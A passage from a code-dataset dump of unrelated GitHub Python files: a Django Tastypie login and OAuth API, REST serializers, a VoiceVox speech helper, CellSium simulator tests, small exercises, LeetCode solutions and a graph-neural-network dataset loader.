authenticate, login, logout\nfrom tastypie.http import HttpUnauthorized, HttpForbidden\nfrom django.conf.urls import url\nfrom tastypie.utils import trailing_slash\nfrom tastypie.models import create_api_key, ApiKey\nfrom tastypie.exceptions import BadRequest\nfrom django.db import IntegrityError\nfrom tastypie.authentication import ApiKeyAuthentication,BasicAuthentication,Authentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom YqlConnect.oauthUsers import OauthUsers\nfrom YqlConnect.connectToYqlOauth import ConnectToYqlOauth\n\n# models.signals.post_save.connect(create_api_key, sender=User)\n\n\nclass RequestToken(ModelResource):\n\n class Meta:\n resource_name = 'RequestToken'\n default_format = \"application/json\"\n authentication = ApiKeyAuthentication()\n\n def get_list(self, request, **kwargs):\n # Do any operation here and return in form of json in next line\n username = request.user.username;\n oauthUsers = OauthUsers()\n response = oauthUsers.requestOauth(username)\n\n if(response[0] == 'RefreshAccessToken'):\n c = ConnectToYqlOauth(username)\n userInformationRetrieval = c.getAllUserInformation();\n return self.create_response(request, {'responseType':response[0], 'value':response[1], 'userInformationRetrieval':userInformationRetrieval})\n else:\n return self.create_response(request, {'responseType':response[0], 'value':response[1]})\n\nclass AccessToken(ModelResource):\n\n class Meta:\n resource_name = 'AccessToken'\n default_format = \"application/json\"\n authentication = ApiKeyAuthentication()\n\n def get_list(self, request, **kwargs):\n # Do any operation here and return in form of json in next line\n username = request.user.username;\n oauth_verifier = request.GET['oauth_verifier']\n oauthUsers = OauthUsers()\n response = oauthUsers.getAccessToken(username,oauth_verifier)\n c = ConnectToYqlOauth(username)\n userInformationRetrieval = c.getAllUserInformation();\n return self.create_response(request, {'responseType':response[0], 'accessTokenRetrieval':response[1], 'userInformationRetrieval':userInformationRetrieval})\n\n\n\nclass UserResource(ModelResource):\n class Meta:\n queryset = User.objects.all()\n fields = ['first_name', 'last_name', 'email','username']\n allowed_methods = ['get', 'post']\n resource_name = 'user'\n filtering = {\n \"username\": (\"exact\")\n }\n always_return_data = True\n\n 
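# override_urls is Tastypie's older hook (later renamed prepend_urls); it\n    # registers the extra /login and /logout endpoints defined below.\n    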
def override_urls(self):\n return [\n url(r\"^(?P%s)/login%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('login'), name=\"api_login\"),\n url(r'^(?P%s)/logout%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('logout'), name='api_logout'),\n ]\n\n def obj_create(self, bundle, request=None, **kwargs):\n username, password, email = bundle.data['username'], bundle.data['password'], bundle.data['email']\n try:\n bundle.obj = user = User.objects.create_user(username,email,password)\n apiKey = ApiKey.objects.create(user=user)\n \n bundle.data['apiKey'] = apiKey.key\n except IntegrityError:\n raise BadRequest('That username already exists')\n return bundle\n \n def login(self, request, **kwargs):\n self.method_check(request, allowed=['post'])\n\n data = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))\n\n username = data.get('username', '')\n password = data.get('password', '')\n\n user = authenticate(username=username, password=password)\n if user:\n apiKey = ApiKey.objects.get(user = user)\n apiKey = apiKey.key\n if user.is_active:\n login(request, user)\n return self.create_response(request, {\n 'success': True, 'apiKey' : apiKey\n })\n else:\n return self.create_response(request, {\n 'success': False,\n 'reason': 'disabled',\n }, HttpForbidden )\n else:\n return self.create_response(request, {\n 'success': False,\n 'reason': 'incorrect',\n }, HttpUnauthorized )\n\n def logout(self, request, **kwargs):\n self.method_check(request, allowed=['get'])\n if request.user and request.user.is_authenticated():\n logout(request)\n return self.create_response(request, { 'success': True })\n else:\n return self.create_response(request, { 'success': False }, HttpUnauthorized)\n","repo_name":"ArcQ/OneStopFantasy","sub_path":"BackEnd/OneStopFantasy/RestApi/apiAuth.py","file_name":"apiAuth.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8596974276","text":"from rest_framework import serializers\n\n# Local\nfrom .models import Attribute, AllowedValue\nfrom oauth2.models import PaipassApplication\n#from debug.tools.dissect import print_object\nclass AllowedValueSerializer(serializers.Serializer):\n\n application = serializers.UUIDField(source='clientId')\n value = serializers.CharField()\n\nclass FormatSerializer(serializers.Serializer):\n\n regex = serializers.CharField()\n description = serializers.CharField()\n\nclass AttributeSerializer(serializers.Serializer):\n # messy for the sake of time; this could be cleaned up with a namedtuple\n optional_fields ={\"description\": [\"description\", serializers.CharField],\n 'maxValues': [\"max_values\", serializers.IntegerField],\n 'maxOwnerPerms': [\"max_owner_perms\",\n serializers.IntegerField],\n 'maxAllPerms': ['max_all_perms',\n serializers.IntegerField],\n 'format': ['format', FormatSerializer],\n\n }\n\n application = serializers.UUIDField(source='clientId')\n name = serializers.CharField(source='keyName')\n description = serializers.CharField()\n is_editable = serializers.BooleanField(source='isEditable')\n\n def __new__(cls, *args, **kwargs):\n cls.construct_optional_fields(kwargs['data'])\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.optional_fields:\n if hasattr(self.__class__, field):\n self.fields[field] = getattr(self.__class__, field)\n\n 
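# The classmethods below set a class-level serializer Field for each optional\n    # key found in the incoming data; __init__ then copies them into self.fields.\n    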
@classmethod\n    def construct_optional_fields(cls, data):\n        for field in cls.optional_fields:\n            if field in data:\n                cls.construct_optional_field(field)\n\n    @classmethod\n    def construct_optional_field(cls, name):\n        optional_field = cls.optional_fields[name]\n        cls_attr_name = optional_field[0]\n        Field = optional_field[1]\n        if name!=cls_attr_name:\n            setattr(cls, cls_attr_name, Field(source=name))\n        else:\n            setattr(cls, cls_attr_name, Field())\n\n\nclass CreateAttributeSerializer(serializers.Serializer):\n\n    def __new__(cls, *args, **kwargs):\n        cls.construct_fields(kwargs['data'])\n        return super().__new__(cls, *args, **kwargs)\n\n    def __init__(self, *args, **kwargs):\n        fields = kwargs.pop('fields', None)\n        super().__init__(*args, **kwargs)\n        self.fields['allowedValues'] = self.allowedValues\n        self.fields['attribute'] = self.attribute\n\n\n    @classmethod\n    def construct_fields(cls, data):\n        setattr(cls, 'attribute', AttributeSerializer(data=data))\n        if 'allowedValues' in data:\n            allowed_values = AllowedValueSerializer(many=True)\n            setattr(cls, 'allowedValues', allowed_values)\n        #_, s = print_object('CreateAttributeSerializer.construct_fields.cls',\n        #                    cls)\n        #print(s,flush=True)\n\n    def create(self, validated_data):\n        attr = validated_data['attribute']\n        format = attr.pop('format')\n        attr['format_regex'] = format['regex']\n        attr['format_description'] = format['description']\n        attr['application'] = PaipassApplication.objects.all().get(id=attr.pop('clientId'))\n        attr['name'] = attr.pop('keyName')\n        attr['is_editable'] = attr.pop('isEditable')\n\n        preexisting_attrs = Attribute.objects.all().filter(application=attr['application'],\n                                                           name=attr['name'])\n        if preexisting_attrs.count() > 0:\n            attribute = preexisting_attrs.first()\n            attribute.update(**attr)\n            attribute.save()\n            for allowed_value in validated_data['allowedValues']:\n                av = AllowedValue.objects.all().get(attribute=attribute)\n                av.update(value=allowed_value['value'])\n                av.save()\n        else:\n            attribute = Attribute.objects.create(**attr)\n            attribute.save()\n            for allowed_value in validated_data['allowedValues']:\n\n                av = AllowedValue.objects.create(value=allowed_value['value'],\n                                                 attribute=attribute)\n                av.save()\n        return attribute\n","repo_name":"projectpai/paipass","sub_path":"backend/attributes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30766310770","text":"from datetime import date\ndata = date.today().year\natual= int(input('Year of birth: '))\nidade = data - atual\n\nif idade == 18:\n    print(f'Time for you to report to the barracks hahaha, you are {idade} years old')\nelif idade<18:\n    hm = 18 - idade\n    print(f'you still have {hm} years to go haha')\n    print(f'Lucky you, you were born in {atual} and are {idade} years old')\nelse:\n    hm = idade - 18\n    print(f'come on man, you should have been in the army {hm} years ago')\n    ","repo_name":"Alvrzz/Repositorio-de-estudos-pessoais-Entra21","sub_path":"repositorio_de_estudos_entra21/estudos_pratica/Python/quartel maioridade.py","file_name":"quartel maioridade.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11932905237","text":"'''\r\nCreated on 5 jun 2022\r\n\r\n@author: txema\r\n'''\r\nimport time\r\n\r\nhora = time.strftime(\"%H\")\r\nminutos = time.strftime(\"%M\")\r\n\r\nif int(hora)>= 19:\r\n    print(\"Time to go home\")\r\n
casa\")\r\n \r\nelse:\r\n print(\"Quedan {} horas y {} minutos para acabar el curro\". format(18 - int(hora), 59-int(minutos)))\r\n\r\n","repo_name":"txematc/openBootcamp","sub_path":"practica/ejercicio_7_2.py","file_name":"ejercicio_7_2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5467022090","text":"from dotenv import load_dotenv, find_dotenv\r\nimport os \r\n_ = load_dotenv(find_dotenv())\r\nBASE_URL=f\"http://127.0.0.1:{os.getenv('VOICEVOX_PORT')}\"\r\nimport urllib.parse as up\r\nimport requests\r\n\r\nSYSTEM=\"WINDOWS\"\r\n\r\n\r\n#text 2 audio function \r\ndef speak(sentence,speach_filename,base_url=BASE_URL,save_audio=False):\r\n speaker_id=os.getenv(\"speaker_id\")\r\n params_encoded=up.urlencode({\"text\":sentence,\"speaker\": speaker_id})\r\n r = requests.post(f\"{base_url}/audio_query?{params_encoded}\")\r\n print(r) \r\n #Raylene defulat audio settins \r\n voicevox_query = r.json()\r\n voicevox_query[\"volumeScale\"] = os.getenv(\"volumeScale\")\r\n voicevox_query[\"intonationScale\"] = os.getenv(\"intonationScale\")\r\n voicevox_query[\"prePhonemeLength\"]= os.getenv(\"prePhonemeLength\")\r\n voicevox_query[\"postPhonemeLength\"]= os.getenv(\"postPhonemeLength\")\r\n\r\n #Sythesize voice as wav file\r\n params_encoded = up.urlencode({\"speaker\":speaker_id})\r\n \r\n r = requests.post(f\"{base_url}/synthesis?{params_encoded}\",json=voicevox_query)\r\n\r\n with open(speach_filename+\".wav\", \"wb\") as f:\r\n f.write(r.content)\r\n f.close()\r\n\r\n #play audio \r\n if SYSTEM==\"WINDOWS\":\r\n import winsound\r\n winsound.PlaySound(speach_filename+\".wav\",winsound.SND_FILENAME)\r\n if not save_audio: #Delate speach filename after use \r\n os.remove(speach_filename+\".wav\")\r\n else: #Save the text file as well\r\n #Save text \r\n with open(speach_filename+\".txt\",\"w\",encoding=\"utf-8\") as f:\r\n f.write(sentence)\r\n f.close()\r\n else:\r\n import wave,pyaudio\r\n #Non windows audo code to finish \r\n wf = wave.open(speach_filename+\".wav\")\r\n p = pyaudio.PyAudio()\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n # 音声を再生\r\n chunk = 1024\r\n data = wf.readframes(chunk)\r\n while data != '':\r\n stream.write(data)\r\n data = wf.readframes(chunk)\r\n stream.close()\r\n p.terminate()\r\n","repo_name":"JarvisSan22/chracter_discordbot","sub_path":"utils/voicevox_utils.py","file_name":"voicevox_utils.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71244889049","text":"# Circle.py\nimport random\nimport math\n\n# Illustrate use of random numbers for integration using \n# introductory dart-board example\n\n# Initialize the random number generator using specified seed\nSEED = 203\nrandom.seed(SEED)\n\nNINSTANCES = 4000000 # Number of experiments to run\nNTOPRINT = 10 # Number of experiments to print\n\n# Keep track of number within unit circle of radius, 1.0\nncircle = 0\n\n# Generate multiple sets of two uniform random numbers each \n# in the range (-1.0,1.0). So random points inside a square with \n# sides of length 2 centered on (0,0)\n# The square has an area of 2*2 = 4 units. 
\n# What is the area of the circle with radius 1?\n\nfor i in range(NINSTANCES):\n x = random.uniform(-1.0,1.0)\n y = random.uniform(-1.0,1.0)\n# calculate the distance from the origin\n r = math.sqrt(x*x + y*y)\n if r < 1.0:\n ncircle += 1 # point is inside the circle, so count it\n if i < NTOPRINT:\n print('Trial ',i,' x = ',x,' y = ',y,' r = ',r)\n\nprint('Number of trial random numbers inside circle of radius 1.0 = ',ncircle)\n\n#Add extra code here from circle.txt\n","repo_name":"grahamwwilson/QNrandom","sub_path":"Circle.py","file_name":"Circle.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20199135264","text":"# encoding=utf-8\n\nimport json\nimport sys\n\ndef parse_song_line(in_line):\n # json.loads() converts a JSON-formatted string into a dict\n data = json.loads(in_line)\n name = data[\"result\"][\"name\"]\n tags = \",\".join(data[\"result\"][\"tags\"])\n subscribed_count = data[\"result\"][\"subscribedCount\"]\n if(subscribed_count<100):\n return False\n playlist_id = data[\"result\"][\"id\"]\n song_info = \"\"\n songs = data[\"result\"][\"tracks\"]\n for song in songs:\n try:\n song_info += \"\\t\"+\":::\".join([str(song[\"id\"]),song[\"name\"],song[\"artists\"][0][\"name\"],str(song[\"popularity\"])])\n except Exception as e:\n continue\n return name+\"##\"+tags+\"##\"+str(playlist_id)+\"##\"+str(subscribed_count)+song_info\n\n\ndef parse_file(in_file, out_file):\n out = open(out_file, \"w\",encoding=\"utf-8\")\n for line in open(in_file,\"rb\"):\n result = parse_song_line(line)\n if (result):\n out.write(result.strip() + \"\\n\")\n out.close()\n\n\n# Is the .json file GBK-encoded?\nparse_file(\"G:\\\\datas\\\\recommend\\\\playlistdetail.all.json\",\"G:\\\\datas\\\\recommend\\\\playlistdetail.result.txt\")\n","repo_name":"heartbeatbymoon/myPythonTest_2020","sub_path":"music_recomend_system/Data_transform.py","file_name":"Data_transform.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18390433240","text":"from pathlib import Path\n\nimport cv2\nimport matplotlib.pyplot\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_almost_equal\n\nfrom ..output import (\n OutputReproducibleFiles,\n check_overwrite,\n ensure_extension,\n ensure_path,\n)\nfrom ..output.all import (\n COCOOutput,\n FluorescenceRenderer,\n GenericMaskOutput,\n JsonPickleSerializer,\n MeshOutput,\n NoisyUnevenIlluminationPhaseContrast,\n Output,\n PlainRenderer,\n QuickAndDirtyTableDumper,\n SvgRenderer,\n TiffOutput,\n TrackMateXML,\n YOLOOutput,\n)\nfrom ..output.gt import (\n COCOEncodeRLE,\n COCOOutputStuff,\n GroundTruthOnlyCompleteCellsInImages,\n GroundTruthOutput,\n binary_to_rle,\n)\nfrom ..output.mesh import MeshCellScaleFactor\nfrom ..output.plot import PlotRenderer\nfrom ..output.render import (\n OpenCVimshow,\n RenderChannels,\n RoiOutputScaleDelta,\n RoiOutputScaleFactor,\n add_if_uneven,\n bytescale,\n cv2_has_write_support,\n get_canvas_points_for_cell,\n get_canvas_points_raw,\n new_canvas,\n render_on_canvas_matplotlib,\n scale_points_absolute,\n scale_points_relative,\n)\nfrom ..output.serialization import type2numpy\nfrom ..output.xml import TrackMateXMLExportFluorescences, TrackMateXMLExportLengthTypo\n\n\ndef test_jsonpickle(simulator, capsys):\n\n output = JsonPickleSerializer()\n output.display(simulator.simulation.world)\n\n captured = capsys.readouterr()\n\n 
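# print() appends a trailing newline to the dump; drop all newlines so the\n # comparison against the expected single-line output below is exact.\n 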
result = captured.out.replace('\\n', '')\n expected = (\n '{\"py/object\": \"cellsium.simulation.simulator.World\", \"cells\": [{\"py/object\":'\n ' \"cellsium.cli.SizerCell\", \"lineage_history\": [0], \"id_\": 1, \"parent_id\": 0, '\n '\"birth_time\": 0.0, \"angle\": 3.6942842669518385, \"position\": '\n '[17.90727229572483, 29.944407189601154], \"bend_overall\": 0.01753978255362451,'\n ' \"bend_upper\": -0.04126808565523994, \"bend_lower\": -0.09614075306364522, '\n '\"length\": 1.636246698756115, \"width\": 0.9548930351446809, \"division_size\": '\n '2.898390206023354, \"elongation_rate\": 1.5}], \"boundaries\": [], '\n '\"cells_to_add\": [], \"cells_to_remove\": []}'\n )\n\n assert result == expected\n\n\ndef test_type2numpy_nomaxlen():\n assert type2numpy([1, 2]) == '(2,)i8'\n\n\ndef test_type2numpy_nonsense():\n with pytest.raises(RuntimeError):\n type2numpy(type2numpy)\n\n\ndef test_qadtd_empty(simulator):\n for cell in simulator.simulation.world.cells:\n simulator.simulation.world.remove(cell)\n\n simulator.simulation.world.commit()\n\n output = QuickAndDirtyTableDumper()\n\n assert len(output.output(simulator.simulation.world)) == 0\n\n\ndef test_svgrenderer_display(simulator):\n output = SvgRenderer()\n\n with pytest.raises(RuntimeError):\n output.display(simulator.simulation.world)\n\n\ndef test_trackmate_display(simulator):\n output = TrackMateXML()\n\n with pytest.raises(RuntimeError):\n output.display(simulator.simulation.world)\n\n\ndef test_trackmate_no_fluor(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n for _ in range(2):\n simulator.step(60.0 * 60.0)\n\n with tunables((TrackMateXMLExportFluorescences, '')):\n output = TrackMateXML()\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_trackmate_typo(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n for _ in range(2):\n simulator.step(60.0 * 60.0)\n\n with tunables((TrackMateXMLExportLengthTypo, False)):\n output = TrackMateXML()\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_trackmate_growth(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n\n output = TrackMateXML()\n\n for _ in range(5):\n simulator.step(60.0 * 60.0)\n output.write(simulator.simulation.world, testfile, overwrite=True)\n\n\ndef test_gt_output(simulator):\n output = GroundTruthOutput()\n\n with pytest.raises(RuntimeError):\n output.output(simulator.simulation.world)\n\n\ndef test_gt_virtual():\n output = GroundTruthOutput()\n\n output._write_initializations(None, '')\n output._write_perform(None, '')\n\n\ndef test_yolo_off_canvas_cells(simulator, tmpdir, tunables):\n testdir = tmpdir.join('yoloout')\n\n output = YOLOOutput()\n\n simulator.step(60.0 * 60.0)\n\n # move one cell off canvas\n some_cell_position = simulator.simulation.world.cells[1].position\n some_cell_position[0] += 10000\n\n output.write(simulator.simulation.world, testdir)\n\n with tunables((GroundTruthOnlyCompleteCellsInImages, False)):\n output.write(simulator.simulation.world, testdir, overwrite=True)\n\n\ndef test_yolo_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n testdir = tmpdir.join('yoloout')\n\n output = YOLOOutput()\n\n output.write(simulator.simulation.world, testdir)\n\n output = YOLOOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_coco_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n\n testdir = 
tmpdir.join('cocoout')\n\n output = COCOOutput()\n output.write(simulator.simulation.world, testdir)\n\n output = COCOOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_coco_unreproducible_stuffthings(simulator, tmpdir, tunables):\n with tunables(\n (RenderChannels, 'PlainRenderer'),\n (OutputReproducibleFiles, False),\n (COCOOutputStuff, True),\n (COCOEncodeRLE, True),\n ):\n testdir = tmpdir.join('cocoout')\n\n output = COCOOutput()\n\n simulator.step(60.0 * 60.0)\n\n # move one cell off canvas\n some_cell_position = simulator.simulation.world.cells[1].position\n some_cell_position[0] += 10000\n\n output.write(simulator.simulation.world, testdir)\n\n with tunables((GroundTruthOnlyCompleteCellsInImages, False)):\n output.write(simulator.simulation.world, testdir, overwrite=True)\n\n\ndef test_genericmaskoutput_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n\n testdir = tmpdir.join('cocoout')\n\n output = GenericMaskOutput()\n\n output.write(simulator.simulation.world, testdir)\n\n output = GenericMaskOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_mesh_scale(reset_state, simulator, tmpdir, tunables):\n testfile = tmpdir.join('testfile.stl')\n\n with tunables((MeshCellScaleFactor, 1.1)):\n\n output = MeshOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef test_mesh_output():\n output = MeshOutput()\n\n with pytest.raises(RuntimeError):\n output.display(None)\n\n\ndef test_plotrenderer_quit(simulator, monkeypatch, nop):\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'show', nop)\n\n output = PlotRenderer()\n\n output.display(simulator.simulation.world)\n\n matplotlib.pyplot.close(output.fig.number)\n\n with pytest.raises(KeyboardInterrupt):\n output.display(simulator.simulation.world)\n\n\ndef test_mesh_cell_zoo(reset_state, simulator, tmpdir, add_cell_zoo):\n testfile = tmpdir.join('testfile.stl')\n\n add_cell_zoo(simulator)\n\n output = MeshOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef test_render_debug(reset_state, simulator, tmpdir, add_cell_zoo, chdir):\n new_pwd = tmpdir.mkdir('debugout')\n testfile = tmpdir.join('testfile.png')\n\n add_cell_zoo(simulator)\n\n output = NoisyUnevenIlluminationPhaseContrast()\n output.write_debug_output = True\n\n with chdir(str(new_pwd)):\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n assert len(new_pwd.listdir()) > 0\n\n\ndef test_render_bytescale_nochange():\n input_data = np.zeros((256, 256), dtype=np.uint8)\n\n assert id(bytescale(input_data)) == id(input_data)\n\n\ndef test_render_add_if_uneven():\n assert add_if_uneven(1) == 2\n assert add_if_uneven(2) == 2\n\n\ndef test_fluorescence_not_the_right_channel(\n reset_state, simulator, tmpdir, add_cell_zoo\n):\n testfile = tmpdir.join('testfile.png')\n\n add_cell_zoo(simulator)\n\n output = FluorescenceRenderer()\n output.channel = 1\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_render_multichannel_tif(\n reset_state, simulator, tmpdir, add_cell_zoo, tunables\n):\n testfile = tmpdir.join('testfile.tif')\n\n add_cell_zoo(simulator)\n\n with tunables(\n (RenderChannels, 'NoisyUnevenIlluminationPhaseContrast, FluorescenceRenderer')\n ):\n output = TiffOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef 
test_render_renderchannels_nonsense(tunables):\n assert not RenderChannels.test('foo')\n\n\ndef test_render_mock_failcv2(monkeypatch):\n def raise_cv2_error(*args, **kwargs):\n raise cv2.error()\n\n monkeypatch.setattr(cv2, 'haveImageWriter', raise_cv2_error)\n\n assert not cv2_has_write_support('.foo')\n\n\ndef test_render_scale_points_relative():\n points = np.linspace(0, 1)\n points = np.c_[points, points]\n scale_factor = 1.1\n scaled_points = scale_points_relative(points, scale_factor)\n\n assert_almost_equal(scaled_points.min(), -0.05)\n assert_almost_equal(scaled_points.max(), 1.05)\n\n\ndef test_render_scale_points_absolute_nop():\n points = np.linspace(0, 1)\n points = np.c_[points, points]\n\n scaled_points = scale_points_absolute(points)\n\n assert id(scaled_points) == id(points)\n\n\ndef test_render_get_canvas_points_for_cell(simulator, tunables):\n cell = simulator.simulation.world.cells[0]\n\n with tunables((RoiOutputScaleFactor, 1.0)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleFactor, 1.1)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleDelta, 0.0)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleDelta, 0.1)):\n get_canvas_points_for_cell(cell)\n\n\ndef test_render_plainoutput_display_cv2(simulator, tunables, monkeypatch, nop):\n\n output = PlainRenderer()\n\n with tunables((OpenCVimshow, True)):\n monkeypatch.setattr(cv2, 'imshow', nop)\n monkeypatch.setattr(cv2, 'waitKey', nop)\n\n output.display(simulator.simulation.world)\n\n\ndef test_render_plainoutput_display_matplotlib(simulator, tunables, monkeypatch, nop):\n\n output = PlainRenderer()\n\n with tunables((OpenCVimshow, False)):\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'show', nop)\n\n output.display(simulator.simulation.world)\n\n # the second call will be handled differently, hence we try it as well\n\n output.display(simulator.simulation.world)\n\n\ndef test_render_on_canvas_matplotlib_obscure_options(simulator, monkeypatch, nop):\n canvas = new_canvas()\n array_of_points = [\n get_canvas_points_raw(cell, canvas.shape[0])\n for cell in simulator.simulation.world.cells\n ]\n\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'ioff', nop)\n\n monkeypatch.setattr(matplotlib.pyplot, 'isinteractive', lambda: True)\n\n render_on_canvas_matplotlib(canvas, array_of_points, over_sample=2)\n\n\ndef test_rle():\n mask = np.zeros((128, 128), dtype=bool)\n mask[32 : 32 + 64, 32 : 32 + 64] = 1\n\n result = binary_to_rle(mask)\n\n assert result.ravel().tolist() == ([4128] + ([64] * 127) + [4128])\n\n\ndef test_output_dummy():\n output = object.__new__(Output)\n output.output(None)\n output.write(None, None)\n\n with pytest.raises(RuntimeError):\n output.display(None)\n\n\ndef test_overwrite(tmpdir):\n testfile = tmpdir.join('testfile')\n testfile.write(\"Test\")\n\n with pytest.raises(RuntimeError):\n check_overwrite(str(testfile), overwrite=False)\n\n\ndef test_ensure_extension():\n assert ensure_extension('Hello{}.txt', '.txt') == 'Hello.txt'\n\n\ndef test_mkdir(tmpdir):\n p = Path(str(tmpdir)) / \"some\" / \"directories\"\n\n some_file = p / \"some_file\"\n\n assert not p.exists()\n\n ensure_path(str(some_file))\n\n assert 
p.exists()\n","repo_name":"modsim/CellSium","sub_path":"cellsium/tests/output_test.py","file_name":"output_test.py","file_ext":"py","file_size_in_byte":12314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40891102161","text":"\"\"\"\nTicket numbers usually consist of an even number of digits. A ticket number is considered lucky if the sum of the first half of the digits is equal to the sum of the second half.\n\nGiven a ticket number n, determine if it's lucky or not.\n\"\"\"\n\ndef isLucky(n):\n n = str(n)\n input_list = list(n)\n first = 0\n second = 0\n for i in range(len(input_list)//2):\n first +=int(input_list[i])\n for j in range(len(input_list)//2,len(input_list)):\n second += int(input_list[j])\n if first == second:\n return True\n else:\n return False\n\n","repo_name":"mherkhachatryan/CodeSignal","sub_path":"isLucky.py","file_name":"isLucky.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72944653849","text":"class Solution:\n def carPooling(self, trips: List[List[int]], capacity: int) -> bool:\n \n #print(trips)\n \n #print(capacity)\n \n farest = 0\n \n for num,start,end in trips:\n farest = max(farest, end)\n \n \n farest_space = [0] * farest\n \n #print(farest_space)\n \n for num,start,end in trips:\n for i in range(start,end):\n farest_space[i] += num\n \n if farest_space[i] > capacity:\n return False\n \n return True","repo_name":"algohell/ALGOHELL","sub_path":"1094/pgo.py","file_name":"pgo.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"10991913563","text":"class Solution:\n def diagonalSum(self, mat: List[List[int]]) -> int:\n res=0\n for i in range(len(mat)):\n res+=mat[i][i]\n mat[i][i]=-1\n \n n=len(mat)-1\n for i in range(len(mat)):\n # print(mat[i][n-i])\n if mat[i][n-i]!=-1:\n res+=mat[i][n-i]\n return res","repo_name":"raaam21/Leetcode-Solutions","sub_path":"1572-matrix-diagonal-sum/1572-matrix-diagonal-sum.py","file_name":"1572-matrix-diagonal-sum.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4459541854","text":"import os\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\nfrom tqdm import tqdm\nimport deepchem as dc\nfrom torch_geometric.data import Dataset, Data\n\n\n\nclass GNNDataset(Dataset):\n\n def __init__(self, root, test_data=False, transform=None, pre_transform=None, pre_filter=None):\n self.test_data = test_data\n self.name = \"test\" if self.test_data else \"train\"\n self.df = pd.read_csv(os.path.join(root, \"raw\", f\"{self.name}.csv\"))\n super().__init__(root, transform, pre_transform, pre_filter)\n \n @property\n def raw_file_names(self):\n return [f\"{self.name}.csv\"]\n \n @property\n def processed_file_names(self):\n return [f\"{self.name}_{index+1}.pt\" for index in range(len(self.df))]\n \n\n def download(self):\n pass\n\n def process(self):\n featurizer = dc.feat.MolGraphConvFeaturizer(use_edges=True)\n for index, row in enumerate(tqdm(self.df.iterrows())):\n mol = featurizer.featurize(row[1][\"smiles\"])\n data = mol[0].to_pyg_graph()\n data.y = row[1][\"HIV_active\"]\n data.smiles = row[1][\"smiles\"]\n torch.save(data, \n os.path.join(self.processed_dir, f\"{self.name}_{index+1}.pt\"))\n\n def len(self):\n return len(self.df)\n\n 
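# process() above materialized every sample as its own .pt file, so get()\n # simply loads the pre-processed graph for the requested index from disk.\n 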
